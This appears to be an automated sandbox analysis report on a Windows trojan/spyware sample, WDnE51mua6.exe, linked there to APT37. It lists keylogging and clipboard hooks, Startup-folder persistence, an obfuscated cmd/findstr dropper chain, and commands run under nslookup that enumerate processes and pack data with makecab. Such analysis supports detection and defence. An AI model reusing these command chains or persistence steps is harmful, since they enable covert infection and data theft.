Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown

HTTPS traffic detected: 8.208.95.18:443 -> 192.168.2.6:49730 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to register a low level keyboard hook

Show sources

Source: C:\Users\user\Desktop\WDnE51mua6.exe

Code function: 0_2_00408D9C SetWindowsHookExW 00000002,Function_00008D6E,00000000,00000000

Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com

Code function: 12_2_0029F345 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com

Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com

Code function: 6_2_008B1976 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,

Source: WDnE51mua6.exe, 00000000.00000002.486248274.00000000007DA000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com

Code function: 12_2_002B9B7E DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

System Summary:

Submitted sample is a known malware sample

Show sources

Source: C:\Windows\SysWOW64\cmd.exe

Dropped file: MD5: ac6ad5d9b99757c3a878f2d275ace198 Family: APT37 Alias: Reaper group, Geumseong121, Group 123, Scarcruft, APT-S-008, Red Eyes, TEMP.Reaper, Ricochet Chollima, sun team, APT37 Description: APT37 is a suspected North Korean cyber espionage group that has been in operation since at least 2012. Their targets are primarily located in South Korea, but also Japan, Vietnam, Russia, China, India, and some of the countries in the Middle East. A wider range of industries are affected, including chemicals, electronics, manufacturing, aerospace, automotive and healthcare entities References: https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf https://securelist.com/operation-daybreak/75100/https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/Data Source: https://github.com/RedDrip7/APT_Digital_Weapon

Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com

Code function: 12_2_00294635: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,

Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com

Code function: 12_2_00281A7B LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com

Code function: 12_2_0028F0CD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

Source: C:\Users\user\Desktop\WDnE51mua6.exe	Code function: 0_2_00406024
Source: C:\Users\user\Desktop\WDnE51mua6.exe	Code function: 0_2_0041C873
Source: C:\Users\user\Desktop\WDnE51mua6.exe	Code function: 0_2_0041A836
Source: C:\Users\user\Desktop\WDnE51mua6.exe	Code function: 0_2_0040B140
Source: C:\Users\user\Desktop\WDnE51mua6.exe	Code function: 0_2_004171F6
Source: C:\Users\user\Desktop\WDnE51mua6.exe	Code function: 0_2_0040B9A0
Source: C:\Users\user\Desktop\WDnE51mua6.exe	Code function: 0_2_0040AAA0
Source: C:\Users\user\Desktop\WDnE51mua6.exe	Code function: 0_2_0040B350
Source: C:\Users\user\Desktop\WDnE51mua6.exe	Code function: 0_2_0040A3F0
Source: C:\Users\user\Desktop\WDnE51mua6.exe	Code function: 0_2_0041543A
Source: C:\Users\user\Desktop\WDnE51mua6.exe	Code function: 0_2_0040C4E0
Source: C:\Users\user\Desktop\WDnE51mua6.exe	Code function: 0_2_0041C501
Source: C:\Users\user\Desktop\WDnE51mua6.exe	Code function: 0_2_0041BD00
Source: C:\Users\user\Desktop\WDnE51mua6.exe	Code function: 0_2_0041C5DB
Source: C:\Users\user\Desktop\WDnE51mua6.exe	Code function: 0_2_0040A5B0
Source: C:\Users\user\Desktop\WDnE51mua6.exe	Code function: 0_2_00410740
Source: C:\Users\user\Desktop\WDnE51mua6.exe	Code function: 0_2_00405729
Source: C:\Users\user\Desktop\WDnE51mua6.exe	Code function: 0_2_0040FFD8
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com	Code function: 6_2_008D80C7
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com	Code function: 6_2_008EE920
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com	Code function: 6_2_008E6B8B
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com	Code function: 6_2_008DCEC0
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com	Code function: 6_2_008DE600
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com	Code function: 6_2_008D7E6A
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com	Code function: 6_2_008D17B4
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_00242097
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_002480C7
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_002221FD
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_0025A30E
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_00242352
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_0023C45C
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_002AC5C4
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_002928D7
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_0025E920
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_00288AB4
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_0023CBB2
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_00256B8B
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_0024CEC0
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_002B4F4F
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_0022D000
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_002571F9
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_00229540
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_002417B4
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_00229A20
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_00241B26
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_00247C3B
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_00241DD0
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_00247E6A
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_00229E80
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_0023DF78
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 16_3_03B97C2C
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 16_3_03B97C2C
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 16_3_03B97C2C
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 16_3_03B97C2C

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com 05D8CF394190F3A707ABFB25FB44D7DA9D5F533D7D2063B23C00CC11253C8BE7

Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: String function: 00240E50 appears 46 times
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: String function: 0023FE52 appears 39 times
Source: C:\Users\user\Desktop\WDnE51mua6.exe	Code function: String function: 00404F59 appears 41 times

Source: juROhmfLml.exe.com.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: juROhmfLml.exe.com.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: juROhmfLml.exe.com.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: juROhmfLml.exe.com.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: juROhmfLml.exe.com.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: juROhmfLml.exe.com.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: WDnE51mua6.exe, 00000000.00000002.489362010.0000000002B50000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs WDnE51mua6.exe
Source: WDnE51mua6.exe, 00000000.00000002.489362010.0000000002B50000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs WDnE51mua6.exe
Source: WDnE51mua6.exe, 00000000.00000002.485886366.0000000000427000.00000002.00020000.sdmp	Binary or memory string: OriginalFilename7ZSfxMod_x86.exe< vs WDnE51mua6.exe
Source: WDnE51mua6.exe, 00000000.00000002.488920190.0000000002A50000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs WDnE51mua6.exe
Source: WDnE51mua6.exe	Binary or memory string: OriginalFilename7ZSfxMod_x86.exe< vs WDnE51mua6.exe

Source: WDnE51mua6.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@35/26@3/3

Source: C:\Users\user\Desktop\WDnE51mua6.exe

Code function: 0_2_00409684 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,

Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_00281939 AdjustTokenPrivileges,CloseHandle,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_00281F3D LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,

Source: C:\Users\user\Desktop\WDnE51mua6.exe

Code function: 0_2_004023DF GetDiskFreeSpaceExW,SendMessageW,

Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com

Code function: 12_2_002AADEE CreateToolhelp32Snapshot,Process32FirstW,CompareStringW,Process32NextW,CloseHandle,

Source: C:\Users\user\Desktop\WDnE51mua6.exe

Code function: 0_2_00409332 GetDlgItem,GetDlgItem,SendMessageW,GetDlgItem,GetDlgItem,GetWindowLongW,GetDlgItem,SetWindowLongW,GetSystemMenu,EnableMenuItem,GetDlgItem,SetFocus,SetTimer,CoCreateInstance,GetDlgItem,IsWindow,GetDlgItem,EnableWindow,GetDlgItem,ShowWindow,

Source: C:\Users\user\Desktop\WDnE51mua6.exe

Code function: 0_2_00403908 GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,GetProcAddress,GetProcAddress,wsprintfW,GetProcAddress,

Source: C:\Users\user\Desktop\WDnE51mua6.exe

File created: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6324:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:724:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6048:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4188:120:WilError_01

Source: C:\Windows\SysWOW64\nslookup.exe

File created: C:\Users\user\AppData\Local\Temp\chrB32.tmp

Jump to behavior

Source: WDnE51mua6.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process

Source: C:\Users\user\Desktop\WDnE51mua6.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\WDnE51mua6.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: WDnE51mua6.exe	Virustotal: Detection: 41%
Source: WDnE51mua6.exe	ReversingLabs: Detection: 64%

Source: C:\Users\user\Desktop\WDnE51mua6.exe

File read: C:\Users\user\Desktop\WDnE51mua6.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\WDnE51mua6.exe 'C:\Users\user\Desktop\WDnE51mua6.exe'
Source: C:\Users\user\Desktop\WDnE51mua6.exe	Process created: C:\Windows\SysWOW64\svchost.exe 'C:\Windows\System32\svchost.exe'
Source: C:\Users\user\Desktop\WDnE51mua6.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c CmD < Poi.vsd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe CmD
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R '^nZwSZJdQSZwKBWJCtpbfZHNwzsXALugVPsbikcLGmlTQMSJGkUUtRoHQkZmHLQyLLuVpnCdInRQPNWfBIsgQkprGKGWkWrUJtiyFXmiJDkGqaSrgKXZxBgABegmS$' Che.vsd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com Gia.exe.com D
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com	Process created: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com D
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30
Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\zPgFqFUsML\wAYZqHgYEOdcYU.js'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com C:\Users\user\AppData\Roaming\zPgFqFUsML\I
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com	Process created: C:\Windows\SysWOW64\nslookup.exe C:\Windows\SysWOW64\nslookup.exe
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Process created: C:\Windows\SysWOW64\nslookup.exe C:\Windows\SysWOW64\nslookup.exe
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ver > 'C:\Users\user\AppData\Local\Temp\chrCF8.tmp'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C wmic process get Name > 'C:\Users\user\AppData\Local\Temp\chr1073.tmp'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process get Name
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c makecab /V3 'C:\Users\user\AppData\Local\Temp\4624a8e10d6df3306e1dd46223b6b1968208dd49' 'C:\Users\user\AppData\Local\Temp\chr2302.tmp'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\makecab.exe makecab /V3 'C:\Users\user\AppData\Local\Temp\4624a8e10d6df3306e1dd46223b6b1968208dd49' 'C:\Users\user\AppData\Local\Temp\chr2302.tmp'
Source: C:\Users\user\Desktop\WDnE51mua6.exe	Process created: C:\Windows\SysWOW64\svchost.exe 'C:\Windows\System32\svchost.exe'
Source: C:\Users\user\Desktop\WDnE51mua6.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c CmD < Poi.vsd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe CmD
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R '^nZwSZJdQSZwKBWJCtpbfZHNwzsXALugVPsbikcLGmlTQMSJGkUUtRoHQkZmHLQyLLuVpnCdInRQPNWfBIsgQkprGKGWkWrUJtiyFXmiJDkGqaSrgKXZxBgABegmS$' Che.vsd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com Gia.exe.com D
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com	Process created: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com D
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com	Process created: C:\Windows\SysWOW64\nslookup.exe C:\Windows\SysWOW64\nslookup.exe
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Process created: C:\Windows\SysWOW64\nslookup.exe C:\Windows\SysWOW64\nslookup.exe
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ver > 'C:\Users\user\AppData\Local\Temp\chrCF8.tmp'
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C wmic process get Name > 'C:\Users\user\AppData\Local\Temp\chr1073.tmp'
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c makecab /V3 'C:\Users\user\AppData\Local\Temp\4624a8e10d6df3306e1dd46223b6b1968208dd49' 'C:\Users\user\AppData\Local\Temp\chr2302.tmp'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process get Name
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\makecab.exe makecab /V3 'C:\Users\user\AppData\Local\Temp\4624a8e10d6df3306e1dd46223b6b1968208dd49' 'C:\Users\user\AppData\Local\Temp\chr2302.tmp'

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: WDnE51mua6.exe

Static file information: File size 1338284 > 1048576

Data Obfuscation:

Obfuscated command line found

Show sources

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R '^nZwSZJdQSZwKBWJCtpbfZHNwzsXALugVPsbikcLGmlTQMSJGkUUtRoHQkZmHLQyLLuVpnCdInRQPNWfBIsgQkprGKGWkWrUJtiyFXmiJDkGqaSrgKXZxBgABegmS$' Che.vsd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R '^nZwSZJdQSZwKBWJCtpbfZHNwzsXALugVPsbikcLGmlTQMSJGkUUtRoHQkZmHLQyLLuVpnCdInRQPNWfBIsgQkprGKGWkWrUJtiyFXmiJDkGqaSrgKXZxBgABegmS$' Che.vsd

Source: C:\Users\user\Desktop\WDnE51mua6.exe

Code function: 0_2_00407E2D LoadLibraryA,GetProcAddress,GetWindow,GetWindow,GetDlgItem,GetWindow,

Source: C:\Users\user\Desktop\WDnE51mua6.exe	Code function: 0_3_0464985C pushfd ; retf 0001h
Source: C:\Users\user\Desktop\WDnE51mua6.exe	Code function: 0_3_0464985C pushfd ; retf 0001h
Source: C:\Users\user\Desktop\WDnE51mua6.exe	Code function: 0_3_0464985C pushfd ; retf 0001h
Source: C:\Users\user\Desktop\WDnE51mua6.exe	Code function: 0_3_0464985C pushfd ; retf 0001h
Source: C:\Users\user\Desktop\WDnE51mua6.exe	Code function: 0_2_0041C1C0 push eax; ret
Source: C:\Users\user\Desktop\WDnE51mua6.exe	Code function: 0_2_0041BEF0 push ecx; mov dword ptr [esp], ecx
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com	Code function: 6_2_008D0E96 push ecx; ret
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_00240E96 push ecx; ret
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 16_3_03B9799C push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 16_3_03B9799C push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 16_3_03B9799C push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 16_3_03B972F3 push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 16_3_03B972F3 push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 16_3_03B972F3 push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 16_3_03B96AE2 push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 16_3_03B96AE2 push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 16_3_03B972D6 push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 16_3_03B972D6 push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 16_3_03B972D6 push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 16_3_03B9642F push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 16_3_03B9642F push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 16_3_03B9D24C push esi; iretd
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 16_3_03B9D24C push esi; iretd
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 16_3_03B9D24C push esi; iretd
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 16_3_03B9799C push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 16_3_03B9799C push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 16_3_03B9799C push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 16_3_03B972F3 push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 16_3_03B972F3 push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 16_3_03B972F3 push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 16_3_03B96AE2 push esi; retf

Persistence and Installation Behavior:

Creates processes via WMI

Show sources

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops PE files with a suspicious file extension

Show sources

Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com

File created: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com

Jump to dropped file

Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com

File created: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com

Jump to dropped file

Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juROhmfLml.url

Jump to behavior

Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juROhmfLml.url

Jump to behavior

Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com	Code function: 6_2_008CFC88 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_002B231B IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_0023FC88 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

Source: C:\Users\user\Desktop\WDnE51mua6.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\WDnE51mua6.exe	Process information set: NOOPENFILEERRORBOX
